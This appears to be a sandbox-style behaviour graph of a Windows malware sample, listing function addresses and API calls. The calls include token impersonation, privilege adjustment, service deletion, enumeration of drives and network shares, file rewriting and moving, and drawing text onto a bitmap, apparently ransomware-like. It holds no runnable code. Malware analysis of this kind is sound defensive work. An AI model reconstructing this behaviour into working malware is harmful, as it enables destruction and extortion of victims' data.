9b5359 8 API calls 4285->4286 4287 9b42fa 4286->4287 4288 9b494c 3 API calls 4287->4288 4289 9b4306 4288->4289 4290 9b4321 CreateProcessWithTokenW 4289->4290 4291 9b4359 LocalFree CloseHandle CloseHandle 4290->4291 4292 9b4347 CloseHandle CloseHandle 4290->4292 4291->4272 4292->4291 4295 9b5180 4294->4295 5264 9b508a 4295->5264 4298 9b51aa OpenProcessToken 4299 9b51be 4298->4299 4300 9b51c7 ImpersonateLoggedOnUser 4298->4300 4301 9b4bee FindCloseChangeNotification 4299->4301 4302 9b4bee FindCloseChangeNotification 4300->4302 4303 9b51a6 4301->4303 4304 9b51d9 4302->4304 4303->4112 4305 9b4bee FindCloseChangeNotification 4304->4305 4305->4303 4307 9b1c4d 4306->4307 4308 9b1c58 4307->4308 4499 9b494c 4307->4499 4308->4133 4310 9b1c68 4310->4133 4316 9bb7bc 4311->4316 4312 9b1556 4312->4136 4312->4139 4313 9bc3b1 4313->4312 4314 9bc3ec RtlFreeHeap 4313->4314 4314->4312 4315 9bc497 RtlAllocateHeap HeapCreate GetProcessHeap 4315->4316 4316->4312 4316->4313 4316->4315 4318 9b18c4 4317->4318 4319 9b6747 4317->4319 4324 9bc3ec 4318->4324 4319->4318 4508 9b12fa 4319->4508 4513 9b1296 4319->4513 4518 9b132c 4319->4518 4522 9b12c8 4319->4522 4325 9b18d5 4324->4325 4326 9bc3f7 4324->4326 4325->4144 4326->4325 4327 9b4999 RtlFreeHeap 4326->4327 4327->4326 4329 9b22b7 4328->4329 4572 9b558b RegOpenKeyExW 4329->4572 4332 9b236a 4333 9b558b 8 API calls 4332->4333 4335 9b2389 4333->4335 4334 9b558b 8 API calls 4334->4332 4336 9b23ae 4335->4336 4337 9b558b 8 API calls 4335->4337 4338 9b558b 8 API calls 4336->4338 4337->4336 4339 9b23d3 4338->4339 4340 9b23f5 4339->4340 4341 9b558b 8 API calls 4339->4341 4342 9b558b 8 API calls 4340->4342 4341->4340 4343 9b2417 4342->4343 4344 9b243d 4343->4344 4345 9b558b 8 API calls 4343->4345 4359 9b2484 4344->4359 4583 9b67c7 4344->4583 4345->4344 4347 9b24d2 4586 9b6bb8 4347->4586 4349 9b24f1 4350 9b6bb8 12 API calls 4349->4350 4352 9b2509 4350->4352 4351 9b2693 4351->4147 4352->4351 4594 9b5609 RegCreateKeyExW 4352->4594 4355 9b258d 4357 9b5609 3 API calls 4355->4357 4356 9b5609 3 API calls 4356->4355 4358 9b25af 4357->4358 4360 9b25d5 4358->4360 4363 9b5609 3 API calls 4358->4363 4362 9b266d 4359->4362 4366 9b4999 RtlFreeHeap 4359->4366 4361 9b5609 3 API calls 4360->4361 4365 9b25f3 4361->4365 4364 9b267b 4362->4364 4367 9b4999 RtlFreeHeap 4362->4367 4363->4360 4369 9b4999 RtlFreeHeap 4364->4369 4368 9b2615 4365->4368 4370 9b5609 3 API calls 4365->4370 4366->4362 4367->4364 4372 9b5609 3 API calls 4368->4372 4371 9b2682 4369->4371 4370->4368 4373 9b4999 RtlFreeHeap 4371->4373 4374 9b2637 4372->4374 4375 9b2688 4373->4375 4374->4359 4377 9b5609 3 API calls 4374->4377 4376 9b5d90 6 API calls 4375->4376 4376->4351 4377->4359 4379 9b5dbb 4378->4379 4382 9b1956 4378->4382 4380 9b494c 3 API calls 4379->4380 4381 9b5dc7 4380->4381 4381->4382 4383 9b5dce CryptBinaryToStringW 4381->4383 4386 9b4fec 4382->4386 4383->4382 4384 9b5de4 4383->4384 4385 9b4999 RtlFreeHeap 4384->4385 4385->4382 4387 9b494c 3 API calls 4386->4387 4388 9b4ffa 4387->4388 4389 9b1963 4388->4389 4634 9b576a 4388->4634 4389->4152 4393 9b6253 4389->4393 4391 9b5007 4392 9b5069 wsprintfW 4391->4392 4392->4389 4394 9b625c 4393->4394 4395 9b6260 4393->4395 4394->4152 4396 9b494c 3 API calls 4395->4396 4397 9b6276 4396->4397 4397->4152 4399 9b1cac 4398->4399 4400 9b558b 8 API calls 4399->4400 4401 9b1ce5 4400->4401 4402 9b1d0e 4401->4402 4403 9b558b 8 API calls 4401->4403 4405 9b4999 RtlFreeHeap 4402->4405 4408 9b1d2b 4402->4408 4416 9b1da3 4402->4416 4403->4402 4405->4408 4407 9b1980 4417 9b5126 4407->4417 4649 9b26a1 4408->4649 4409 9b1d63 4413 9b5609 3 API calls 4409->4413 4410 9b4999 RtlFreeHeap 4411 9b1d35 4410->4411 4411->4407 4411->4409 4411->4410 4412 9b26a1 12 API calls 4411->4412 4412->4411 4414 9b1d88 4413->4414 4415 9b5609 3 API calls 4414->4415 4414->4416 4415->4416 4657 9b6654 4416->4657 4418 9b494c 3 API calls 4417->4418 4419 9b5135 4418->4419 4420 9b198a 4419->4420 4421 9b513c GetUserNameW 4419->4421 4420->4158 4420->4159 4421->4420 4422 9b5152 4421->4422 4423 9b4999 RtlFreeHeap 4422->4423 4423->4420 4425 9b494c 3 API calls 4424->4425 4426 9b4ca1 4425->4426 4427 9b19a7 4426->4427 4428 9b4ca8 GetComputerNameW 4426->4428 4427->4162 4427->4163 4429 9b4cbe 4428->4429 4430 9b4cc4 4428->4430 4431 9b4999 RtlFreeHeap 4429->4431 4430->4427 4431->4430 4433 9b4e22 4432->4433 4434 9b558b 8 API calls 4433->4434 4435 9b4e63 4434->4435 4436 9b4e76 4435->4436 4438 9b4e7f 4435->4438 4442 9b19c4 4435->4442 4437 9b4999 RtlFreeHeap 4436->4437 4437->4442 4439 9b4999 RtlFreeHeap 4438->4439 4438->4442 4440 9b4ea3 4439->4440 4441 9b6253 3 API calls 4440->4441 4441->4442 4442->4166 4442->4167 4444 9b4f36 4443->4444 4445 9b558b 8 API calls 4444->4445 4446 9b4f72 4445->4446 4447 9b19e1 4446->4447 4448 9b4999 RtlFreeHeap 4446->4448 4447->4170 4447->4171 4448->4447 4450 9b50cf 4449->4450 4451 9b558b 8 API calls 4450->4451 4453 9b510b 4451->4453 4452 9b1a1d 4452->4178 4452->4179 4453->4452 4454 9b4999 RtlFreeHeap 4453->4454 4454->4452 4459 9b4ce9 4455->4459 4456 9b1a3e 4456->4182 4457 9b4d31 GetDriveTypeW 4457->4459 4458 9b494c 3 API calls 4458->4459 4459->4456 4459->4457 4459->4458 4460 9b4d4d GetDiskFreeSpaceExW 4459->4460 4460->4459 4461->4187 4684 9b1dbb 4462->4684 4465 9b5d90 6 API calls 4466 9b2141 4465->4466 4467 9b4999 RtlFreeHeap 4466->4467 4469 9b2149 4467->4469 4468 9b1a71 4473 9b2204 4468->4473 4469->4468 4702 9b5f8d 4469->4702 4471 9b21e0 4472 9b4999 RtlFreeHeap 4471->4472 4472->4468 4474 9b2222 4473->4474 4475 9b5f8d 4 API calls 4474->4475 4476 9b224a 4475->4476 4477 9b6253 3 API calls 4476->4477 4478 9b2265 4477->4478 4479 9b6654 6 API calls 4478->4479 4482 9b1a76 4478->4482 4480 9b227f 4479->4480 4481 9b4999 RtlFreeHeap 4480->4481 4481->4482 4483 9b1f8f 4482->4483 4484 9b1dbb 21 API calls 4483->4484 4485 9b1fa2 4484->4485 4486 9b1fc8 4485->4486 4487 9b5d90 6 API calls 4485->4487 4486->4193 4488 9b1fb9 4487->4488 4489 9b4999 RtlFreeHeap 4488->4489 4490 9b1fc1 4489->4490 4490->4486 4491 9b5f8d 4 API calls 4490->4491 4492 9b2103 4491->4492 4493 9b4999 RtlFreeHeap 4492->4493 4493->4486 4711 9b4c10 GetCommandLineW CommandLineToArgvW 4494->4711 4496 9b13d7 4498 9b140b 4496->4498 4712 9b4c02 LocalFree 4496->4712 4498->4196 4500 9b4958 HeapCreate 4499->4500 4501 9b497b 4499->4501 4500->4501 4502 9b4970 GetProcessHeap 4500->4502 4505 9b48ee 4501->4505 4502->4501 4504 9b4995 4504->4310 4506 9b48fb RtlAllocateHeap 4505->4506 4507 9b48f7 4505->4507 4506->4504 4507->4504 4527 9b654f 4508->4527 4511 9b1325 4511->4319 4514 9b654f 3 API calls 4513->4514 4515 9b12ae 4514->4515 4516 9b12c1 4515->4516 4517 9b66f9 6 API calls 4515->4517 4516->4319 4517->4516 4519 9b134b 4518->4519 4520 9b6734 8 API calls 4519->4520 4521 9b13be 4520->4521 4521->4319 4523 9b654f 3 API calls 4522->4523 4524 9b12e0 4523->4524 4525 9b12f3 4524->4525 4526 9b66f9 6 API calls 4524->4526 4525->4319 4526->4525 4538 9b490b HeapCreate 4527->4538 4529 9b1312 4529->4511 4534 9b66f9 4529->4534 4530 9b655b 4530->4529 4531 9b48ee RtlAllocateHeap 4530->4531 4532 9b6594 4531->4532 4532->4529 4539 9b4928 HeapDestroy 4532->4539 4535 9b6729 4534->4535 4536 9b6708 4534->4536 4535->4511 4536->4535 4540 9b1000 4536->4540 4538->4530 4539->4529 4541 9b100b 4540->4541 4544 9b65af 4541->4544 4545 9b65c0 4544->4545 4546 9b48ee RtlAllocateHeap 4545->4546 4548 9b1014 4545->4548 4547 9b65e7 4546->4547 4547->4548 4558 9b621e 4547->4558 4548->4536 4550 9b65f8 4551 9b6607 4550->4551 4563 9b5cdd MultiByteToWideChar 4550->4563 4551->4548 4553 9b6632 4551->4553 4554 9b4999 RtlFreeHeap 4551->4554 4555 9b6641 4553->4555 4557 9b4999 RtlFreeHeap 4553->4557 4554->4553 4571 9b4936 RtlFreeHeap 4555->4571 4557->4555 4559 9b622b 4558->4559 4560 9b6227 4558->4560 4561 9b494c 3 API calls 4559->4561 4560->4550 4562 9b623b 4561->4562 4562->4550 4564 9b5cfc 4563->4564 4570 9b5d25 4563->4570 4565 9b494c 3 API calls 4564->4565 4566 9b5d05 4565->4566 4567 9b5d0c MultiByteToWideChar 4566->4567 4566->4570 4568 9b5d1f 4567->4568 4567->4570 4569 9b4999 RtlFreeHeap 4568->4569 4569->4570 4570->4551 4571->4548 4573 9b55ac RegQueryValueExW 4572->4573 4574 9b2342 4572->4574 4575 9b55f7 RegCloseKey 4573->4575 4576 9b55c6 4573->4576 4574->4332 4574->4334 4575->4574 4576->4575 4577 9b494c 3 API calls 4576->4577 4578 9b55d1 4577->4578 4578->4575 4579 9b55d8 RegQueryValueExW 4578->4579 4579->4575 4580 9b55ee 4579->4580 4581 9b4999 RtlFreeHeap 4580->4581 4582 9b55f4 4581->4582 4582->4575 4597 9b681a 4583->4597 4585 9b67d2 4585->4347 4587 9b6bcc 4586->4587 4588 9b6bd3 4586->4588 4587->4349 4589 9b494c 3 API calls 4588->4589 4590 9b6be0 4589->4590 4590->4587 4591 9b67c7 9 API calls 4590->4591 4592 9b6c09 4591->4592 4593 9b6a62 9 API calls 4592->4593 4593->4587 4595 9b562b RegSetValueExW RegCloseKey 4594->4595 4596 9b2567 4594->4596 4595->4596 4596->4355 4596->4356 4600 9b6a62 4597->4600 4601 9b6a77 4600->4601 4609 9b6a86 4600->4609 4612 9b69f3 4601->4612 4604 9b6a7c 4606 9b6829 4604->4606 4615 9b51f6 RtlInitializeCriticalSection 4604->4615 4605 9b6a98 4610 9b6ab5 4605->4610 4617 9b549c 4605->4617 4606->4585 4616 9b4c79 RtlEnterCriticalSection 4609->4616 4610->4606 4625 9b534b RtlLeaveCriticalSection 4610->4625 4613 9b549c 6 API calls 4612->4613 4614 9b6a04 4613->4614 4614->4604 4615->4609 4616->4605 4626 9b586a 4617->4626 4619 9b54b0 4619->4610 4620 9b54aa 4620->4619 4621 9b571c CryptAcquireContextW 4620->4621 4622 9b5742 CryptGenRandom 4620->4622 4623 9b5738 4621->4623 4624 9b5736 4621->4624 4622->4610 4623->4622 4624->4610 4625->4606 4627 9b5878 4626->4627 4628 9b58a5 4626->4628 4627->4628 4630 9b58b3 4627->4630 4628->4620 4632 9b58be 4630->4632 4631 9b595d timeBeginPeriod timeGetTime Sleep timeGetTime 4631->4632 4632->4631 4633 9b594a 4632->4633 4633->4627 4640 9b5c24 GetWindowsDirectoryW 4634->4640 4636 9b5774 4637 9b577c GetVolumeInformationW 4636->4637 4638 9b57a0 4636->4638 4639 9b4999 RtlFreeHeap 4637->4639 4638->4391 4639->4638 4641 9b5c37 4640->4641 4642 9b5c35 4640->4642 4643 9b494c 3 API calls 4641->4643 4642->4636 4644 9b5c41 4643->4644 4645 9b5c48 GetWindowsDirectoryW 4644->4645 4648 9b5c5a 4644->4648 4646 9b5c54 4645->4646 4645->4648 4647 9b4999 RtlFreeHeap 4646->4647 4647->4648 4648->4636 4650 9b26af 4649->4650 4656 9b26ab 4649->4656 4671 9b54cc 4650->4671 4653 9b494c 3 API calls 4654 9b26d1 4653->4654 4655 9b54cc 9 API calls 4654->4655 4654->4656 4655->4654 4656->4411 4658 9b6665 4657->4658 4659 9b48ee RtlAllocateHeap 4658->4659 4661 9b666b 4658->4661 4660 9b668c 4659->4660 4660->4661 4675 9b6411 WideCharToMultiByte 4660->4675 4661->4407 4664 9b66ac 4664->4661 4666 9b66d7 4664->4666 4667 9b4999 RtlFreeHeap 4664->4667 4665 9b6253 3 API calls 4665->4664 4668 9b66e6 4666->4668 4669 9b4999 RtlFreeHeap 4666->4669 4667->4666 4683 9b4936 RtlFreeHeap 4668->4683 4669->4668 4672 9b54dc 4671->4672 4674 9b26bb 4671->4674 4673 9b6a62 9 API calls 4672->4673 4673->4674 4674->4653 4674->4656 4676 9b645a 4675->4676 4677 9b6432 4675->4677 4676->4664 4676->4665 4678 9b494c 3 API calls 4677->4678 4679 9b6438 4678->4679 4679->4676 4680 9b643f WideCharToMultiByte 4679->4680 4680->4676 4681 9b6454 4680->4681 4682 9b4999 RtlFreeHeap 4681->4682 4682->4676 4683->4661 4685 9b1ddf 4684->4685 4686 9b558b 8 API calls 4685->4686 4687 9b1e18 4686->4687 4688 9b1e38 4687->4688 4689 9b558b 8 API calls 4687->4689 4690 9b494c 3 API calls 4688->4690 4692 9b1e5d 4688->4692 4689->4688 4691 9b1e56 4690->4691 4691->4692 4693 9b1e81 _snwprintf 4691->4693 4692->4465 4692->4468 4694 9b1efc 4693->4694 4695 9b6bb8 12 API calls 4694->4695 4696 9b1f0b 4695->4696 4697 9b4999 RtlFreeHeap 4696->4697 4698 9b1f13 4697->4698 4698->4692 4699 9b5609 3 API calls 4698->4699 4700 9b1f35 4699->4700 4700->4692 4701 9b5609 3 API calls 4700->4701 4701->4692 4703 9b5f9c 4702->4703 4706 9b5fc7 4702->4706 4705 9b4999 RtlFreeHeap 4703->4705 4703->4706 4707 9b5fce 4703->4707 4705->4703 4706->4471 4708 9b5fe2 4707->4708 4710 9b6058 4707->4710 4709 9b494c 3 API calls 4708->4709 4708->4710 4709->4710 4710->4703 4711->4496 4712->4498 4714 9b5e50 4713->4714 4714->4207 4715->4214 4717 9b4dcf GetTokenInformation 4716->4717 4718 9b4df3 4716->4718 4719 9b4bee FindCloseChangeNotification 4717->4719 4718->4215 4720 9b4eba OpenProcessToken 4718->4720 4719->4718 4721 9b4ed6 GetTokenInformation 4720->4721 4725 9b4f0f 4720->4725 4722 9b4eef IsValidSid 4721->4722 4723 9b4efe 4721->4723 4722->4723 4724 9b4bee FindCloseChangeNotification 4723->4724 4724->4725 4725->4215 4725->4220 4727 9b4bee FindCloseChangeNotification 4726->4727 4728 9b570e 4727->4728 4729 9b4f8d 4728->4729 4730 9b494c 3 API calls 4729->4730 4731 9b4fa1 4730->4731 4732 9b4fe6 4731->4732 4738 9b4fa8 4731->4738 4732->4225 4732->4226 4733 9b4fac GetModuleFileNameW 4734 9b4fd8 4733->4734 4733->4738 4736 9b4999 RtlFreeHeap 4734->4736 4739 9b4fd6 4734->4739 4735 9b4999 RtlFreeHeap 4735->4738 4736->4739 4737 9b494c 3 API calls 4737->4738 4738->4733 4738->4735 4738->4737 4738->4739 4739->4732 4751 9b4c10 GetCommandLineW CommandLineToArgvW 4740->4751 4742 9b5368 4743 9b53ea 4742->4743 4744 9b5378 LocalFree 4742->4744 4745 9b5383 4742->4745 4743->4228 4744->4743 4746 9b53e1 LocalFree 4745->4746 4747 9b53a4 4745->4747 4746->4743 4748 9b494c 3 API calls 4747->4748 4750 9b53ad 4748->4750 4749 9b53d6 LocalFree 4749->4743 4750->4749 4751->4742 4753 9b2c2a RtlAdjustPrivilege 4752->4753 4754 9b2b8c 4752->4754 4753->4239 4753->4240 4755 9b4f8d 5 API calls 4754->4755 4756 9b2b98 4755->4756 4756->4753 4757 9b5609 3 API calls 4756->4757 4758 9b2bf9 4757->4758 4759 9b2c21 4758->4759 4760 9b5609 3 API calls 4758->4760 4761 9b4999 RtlFreeHeap 4759->4761 4760->4759 4761->4753 4763 9b37f6 4762->4763 4764 9b3b93 EnumServicesStatusExW 4762->4764 4781 9b5425 CreateToolhelp32Snapshot 4763->4781 4765 9b3bca 4764->4765 4766 9b3bb5 RtlGetLastWin32Error 4764->4766 4768 9b494c 3 API calls 4765->4768 4766->4765 4767 9b3bc1 CloseServiceHandle 4766->4767 4767->4763 4769 9b3bd3 4768->4769 4770 9b3beb EnumServicesStatusExW 4769->4770 4771 9b3bdd CloseServiceHandle 4769->4771 4772 9b3cbc CloseServiceHandle 4770->4772 4774 9b3c0d 4770->4774 4771->4763 4772->4763 4773 9b3cab 4773->4772 4774->4773 4775 9b3c4f OpenServiceW 4774->4775 4775->4773 4776 9b3c66 ControlService 4775->4776 4777 9b3c88 DeleteService 4776->4777 4778 9b3cb3 CloseServiceHandle 4776->4778 4779 9b3cb2 4777->4779 4780 9b3c92 4777->4780 4778->4773 4779->4778 4780->4774 4782 9b5446 Process32FirstW 4781->4782 4783 9b3804 CreateThread 4781->4783 4784 9b5460 4782->4784 4783->4253 5248 9b2923 4783->5248 4785 9b548d 4784->4785 4787 9b547b Process32NextW 4784->4787 4786 9b4bee FindCloseChangeNotification 4785->4786 4786->4783 4787->4784 4789 9b32c2 4788->4789 4830 9b3336 4788->4830 4919 9b4c10 GetCommandLineW CommandLineToArgvW 4789->4919 4793 9b32df 4920 9b4c02 LocalFree 4793->4920 4794 9b33d8 4799 9b5162 7 API calls 4794->4799 4795 9b34c3 4798 9b34d4 4795->4798 4881 9b79c5 4795->4881 4797 9b32cb 4797->4793 4800 9b32d2 4797->4800 4802 9b494c 3 API calls 4797->4802 4813 9b3518 4798->4813 4891 9b7a73 WNetOpenEnumW 4798->4891 4803 9b33dd PathRemoveBackslashW PathIsDirectoryW 4799->4803 4800->4259 4836 9b46de GetDC 4800->4836 4805 9b3320 4802->4805 4807 9b340e PathIsNetworkPathW 4803->4807 4808 9b33f0 PathAddBackslashW 4803->4808 4804 9b3545 4906 9b7430 4804->4906 4805->4793 4817 9b3327 4805->4817 4812 9b34bc RevertToSelf 4807->4812 4820 9b341c 4807->4820 4922 9b766a 4808->4922 4812->4813 4813->4804 4821 9b3527 4813->4821 4814 9b7a73 57 API calls 4818 9b34f4 4814->4818 4921 9b4c02 LocalFree 4817->4921 4823 9b7a73 57 API calls 4818->4823 4819 9b4999 RtlFreeHeap 4824 9b3406 4819->4824 4820->4800 4825 9b343b PathAddBackslashW 4820->4825 4821->4804 4821->4813 4940 9b575c Sleep 4821->4940 4826 9b3500 4823->4826 4824->4812 4827 9b494c 3 API calls 4825->4827 4828 9b7a73 57 API calls 4826->4828 4835 9b344f 4827->4835 4829 9b350c 4828->4829 4831 9b7a73 57 API calls 4829->4831 4868 9b74df 4830->4868 4831->4813 4832 9b346e PathAddBackslashW 4832->4835 4833 9b347f PathAddBackslashW 4834 9b766a 53 API calls 4833->4834 4834->4835 4835->4824 4835->4832 4835->4833 4837 9b46fa CreateCompatibleDC 4836->4837 4838 9b48e9 4836->4838 4839 9b48df ReleaseDC 4837->4839 4840 9b470f GetDeviceCaps GetDeviceCaps CreateCompatibleBitmap 4837->4840 4838->4259 4839->4838 4841 9b4743 SelectObject GetDeviceCaps MulDiv CreateFontW 4840->4841 4842 9b48d7 DeleteDC 4840->4842 4843 9b48ce DeleteObject 4841->4843 4844 9b4787 SelectObject SetBkMode SetTextColor GetStockObject FillRect 4841->4844 4842->4839 4843->4842 4845 9b486a DrawTextW 4844->4845 4853 9b47dd 4844->4853 5180 9b45d9 4845->5180 4847 9b489e 4848 9b48c5 DeleteObject 4847->4848 5198 9b4424 GetObjectW 4847->5198 4848->4843 4850 9b54cc 9 API calls 4850->4853 4851 9b4864 4851->4845 4853->4845 4853->4850 4853->4851 4856 9b54cc 9 API calls 4853->4856 4854 9b4999 RtlFreeHeap 4855 9b48c4 4854->4855 4855->4848 4857 9b482d SetPixel 4856->4857 4857->4853 4859 9b1436 4858->4859 4861 9b1446 4859->4861 5223 9b6464 4859->5223 5232 9b1f5f 4861->5232 4864 9b1f5f RtlFreeHeap 4867 9b145c 4864->4867 4865 9b4999 RtlFreeHeap 4865->4867 4866 9b14fa RevertToSelf SetThreadExecutionState 4866->4252 4867->4865 4867->4866 4941 9b490b HeapCreate 4868->4941 4870 9b74eb 4871 9b74f9 CreateIoCompletionPort 4870->4871 4880 9b338d 4870->4880 4872 9b7519 4871->4872 4873 9b750f 4871->4873 4942 9b748f 4872->4942 4949 9b4928 HeapDestroy 4873->4949 4878 9b752f 4879 9b4bee FindCloseChangeNotification 4878->4879 4879->4880 4880->4794 4880->4795 4880->4800 4882 9b494c 3 API calls 4881->4882 4883 9b79d6 4882->4883 4884 9b5162 7 API calls 4883->4884 4890 9b7a69 4883->4890 4887 9b7a11 4884->4887 4885 9b7a5e RevertToSelf 4888 9b4999 RtlFreeHeap 4885->4888 4886 9b7a16 GetDriveTypeW 4886->4887 4887->4885 4887->4886 4889 9b766a 53 API calls 4887->4889 4888->4890 4889->4887 4890->4798 4892 9b7a9a 4891->4892 4893 9b34e8 4891->4893 4894 9b494c 3 API calls 4892->4894 4893->4814 4895 9b7aad 4894->4895 4896 9b7ab4 WNetCloseEnum 4895->4896 4903 9b7ac4 4895->4903 4896->4893 4897 9b7ac5 WNetEnumResourceW 4897->4903 4898 9b7bb9 4899 9b4999 RtlFreeHeap 4898->4899 4900 9b7bbf WNetCloseEnum 4899->4900 4900->4893 4901 9b7a73 53 API calls 4901->4903 4902 9b494c 3 API calls 4902->4903 4903->4897 4903->4898 4903->4901 4903->4902 4904 9b766a 53 API calls 4903->4904 4905 9b4999 RtlFreeHeap 4903->4905 4904->4903 4905->4903 5040 9b53f1 GetSystemInfo 4906->5040 4908 9b7448 4909 9b7452 PostQueuedCompletionStatus 4908->4909 4910 9b746a 4908->4910 5042 9b53f1 GetSystemInfo 4909->5042 4912 9b7479 4910->4912 4913 9b746c 4910->4913 5041 9b4928 HeapDestroy 4912->5041 4913->4910 5043 9b575c Sleep 4913->5043 4916 9b7480 4917 9b4bee FindCloseChangeNotification 4916->4917 4918 9b7488 4917->4918 4918->4800 4919->4797 4920->4800 4921->4830 4923 9b7691 4922->4923 4929 9b76ad 4923->4929 5044 9b7944 4923->5044 4926 9b3400 4926->4819 4927 9b7874 4927->4926 4928 9b4999 RtlFreeHeap 4927->4928 4928->4927 4929->4927 4930 9b4999 RtlFreeHeap 4929->4930 4932 9b7749 FindFirstFileW 4929->4932 4933 9b7737 FindFirstFileExW 4929->4933 4934 9b784b FindNextFileW 4929->4934 4935 9b7861 FindClose 4929->4935 4936 9b7944 3 API calls 4929->4936 4937 9b2d02 12 API calls 4929->4937 5054 9b5408 GetPEB 4929->5054 5055 9b38a7 4929->5055 4930->4929 4932->4929 4933->4929 4934->4929 4934->4935 4935->4929 4936->4929 4937->4929 4940->4821 4941->4870 4951 9b53f1 GetSystemInfo 4942->4951 4944 9b74a4 4945 9b74ab CreateThread 4944->4945 4946 9b74d3 4944->4946 4947 9b4bee FindCloseChangeNotification 4944->4947 4952 9b53f1 GetSystemInfo 4944->4952 4945->4944 4945->4946 4953 9b3561 4945->4953 4946->4880 4950 9b4928 HeapDestroy 4946->4950 4947->4944 4949->4880 4950->4878 4951->4944 4952->4944 4964 9b7568 GetQueuedCompletionStatus 4953->4964 4955 9b3665 RtlGetLastWin32Error 4956 9b357f 4955->4956 4956->4955 4959 9b369d 4956->4959 4965 9b3150 4956->4965 4976 9b3722 4956->4976 4985 9b36ab 4956->4985 4994 9b3236 4956->4994 5004 9b2e8c 4956->5004 5007 9b7568 GetQueuedCompletionStatus 4956->5007 4964->4956 4966 9b4bee FindCloseChangeNotification 4965->4966 4967 9b3164 4966->4967 4968 9b494c 3 API calls 4967->4968 4970 9b317d 4968->4970 4969 9b31ae 5015 9b2eae 4969->5015 4970->4969 5008 9b7989 MoveFileW 4970->5008 4975 9b4999 RtlFreeHeap 4975->4969 4977 9b3747 4976->4977 5030 9b7650 WriteFile 4977->5030 4979 9b377c 4980 9b37a3 4979->4980 4981 9b3781 RtlGetLastWin32Error 4979->4981 4980->4956 4981->4980 4984 9b378d 4981->4984 4984->4979 5031 9b575c Sleep 4984->5031 5032 9b7650 WriteFile 4984->5032 4986 9b36ca 4985->4986 5033 9b7650 WriteFile 4986->5033 4988 9b36f5 4989 9b36fa RtlGetLastWin32Error 4988->4989 4990 9b371e 4988->4990 4989->4990 4991 9b3706 4989->4991 4990->4956 4991->4988 5034 9b575c Sleep 4991->5034 5035 9b7650 WriteFile 4991->5035 5036 9b761c ReadFile 4994->5036 4996 9b3264 4997 9b3269 RtlGetLastWin32Error 4996->4997 4998 9b327a 4996->4998 4999 9b3297 4996->4999 5002 9b3295 4996->5002 4997->4996 4997->5002 4998->4996 5037 9b575c Sleep 4998->5037 5038 9b761c ReadFile 4998->5038 5000 9b2e8c PostQueuedCompletionStatus 4999->5000 5000->5002 5002->4956 5039 9b7585 PostQueuedCompletionStatus 5004->5039 5006 9b2ea9 5006->4956 5007->4956 5009 9b799f RtlGetLastWin32Error 5008->5009 5010 9b31a6 5008->5010 5009->5010 5011 9b79a9 5009->5011 5010->4975 5012 9b5162 7 API calls 5011->5012 5013 9b79ae 5012->5013 5013->5010 5014 9b79b2 MoveFileW 5013->5014 5014->5010 5016 9b2ec3 5015->5016 5021 9b759f 5016->5021 5022 9b4bee FindCloseChangeNotification 5021->5022 5023 9b75ae 5022->5023 5024 9b4999 RtlFreeHeap 5023->5024 5025 9b2ec9 5024->5025 5026 9b7554 5025->5026 5029 9b4936 RtlFreeHeap 5026->5029 5028 9b2ed2 5028->4956 5029->5028 5030->4979 5031->4984 5032->4984 5033->4988 5034->4991 5035->4991 5036->4996 5037->4998 5038->4998 5039->5006 5040->4908 5041->4916 5042->4908 5043->4913 5045 9b494c 3 API calls 5044->5045 5046 9b794f 5045->5046 5047 9b6253 3 API calls 5046->5047 5048 9b76a5 5046->5048 5047->5048 5049 9b2d02 5048->5049 5064 9b5659 5049->5064 5052 9b2d2e 5052->4929 5054->4929 5088 9b2ed8 5055->5088 5058 9b38c7 5058->4929 5060 9b38d6 5061 9b38de 5060->5061 5121 9b7585 PostQueuedCompletionStatus 5060->5121 5061->5058 5062 9b2eae 2 API calls 5061->5062 5062->5058 5065 9b56c9 SetFileSecurityW 5064->5065 5066 9b566d GetCurrentProcess OpenProcessToken 5064->5066 5067 9b2d0d 5065->5067 5069 9b56dd SetFileSecurityW 5065->5069 5066->5067 5068 9b5685 5066->5068 5067->5052 5074 9b410d 5067->5074 5070 9b494c 3 API calls 5068->5070 5069->5067 5071 9b5690 5070->5071 5071->5067 5072 9b569a GetTokenInformation 5071->5072 5072->5067 5073 9b56b1 5072->5073 5073->5065 5075 9b411a 5074->5075 5076 9b494c 3 API calls 5075->5076 5077 9b412d 5076->5077 5082 9b416b 5077->5082 5086 9b7895 CreateFileW 5077->5086 5079 9b415c 5080 9b4999 RtlFreeHeap 5079->5080 5081 9b4164 5080->5081 5081->5082 5087 9b78ed WriteFile 5081->5087 5082->5052 5084 9b4187 5085 9b4bee FindCloseChangeNotification 5084->5085 5085->5082 5086->5079 5087->5084 5122 9b7895 CreateFileW 5088->5122 5090 9b2f43 5126 9b78d4 SetFilePointerEx 5090->5126 5091 9b2f19 5102 9b2f99 5091->5102 5123 9b7540 5091->5123 5094 9b2efa 5094->5090 5094->5091 5095 9b2f13 5094->5095 5098 9b4bee FindCloseChangeNotification 5095->5098 5096 9b2f3f 5100 9b2fa0 RtlGetLastWin32Error 5096->5100 5111 9b2fc7 5096->5111 5097 9b2f52 5127 9b78bb ReadFile 5097->5127 5098->5091 5100->5102 5105 9b2faa 5100->5105 5101 9b2f68 5106 9b4bee FindCloseChangeNotification 5101->5106 5102->5058 5120 9b740b CreateIoCompletionPort 5102->5120 5105->5096 5107 9b7540 RtlAllocateHeap 5105->5107 5134 9b575c Sleep 5105->5134 5106->5091 5107->5105 5108 9b2fe8 RtlGetLastWin32Error 5108->5111 5112 9b3026 5108->5112 5109 9b3067 5156 9b3077 5109->5156 5111->5108 5111->5109 5114 9b3037 5111->5114 5115 9b5659 8 API calls 5111->5115 5118 9b3016 SetFileAttributesW 5111->5118 5128 9b75bb CreateFileW 5111->5128 5113 9b7554 RtlFreeHeap 5112->5113 5113->5102 5114->5111 5135 9b5a77 5114->5135 5155 9b575c Sleep 5114->5155 5117 9b3005 GetFileAttributesW 5115->5117 5117->5111 5117->5112 5118->5111 5118->5112 5120->5060 5121->5061 5122->5094 5124 9b48ee RtlAllocateHeap 5123->5124 5125 9b7550 5124->5125 5125->5096 5126->5097 5127->5101 5129 9b75eb 5128->5129 5130 9b75ef 5128->5130 5129->5111 5131 9b6253 3 API calls 5130->5131 5132 9b75f7 5131->5132 5132->5129 5133 9b4bee FindCloseChangeNotification 5132->5133 5133->5129 5134->5105 5136 9b5a84 5135->5136 5161 9b5408 GetPEB 5136->5161 5138 9b5a9b 5139 9b5c1d 5138->5139 5162 9b5c62 5138->5162 5139->5114 5141 9b5aae 5141->5139 5142 9b5ab6 OpenSCManagerW 5141->5142 5147 9b5ad9 5142->5147 5143 9b5bfe CloseServiceHandle 5143->5139 5145 9b5b4e OpenServiceW 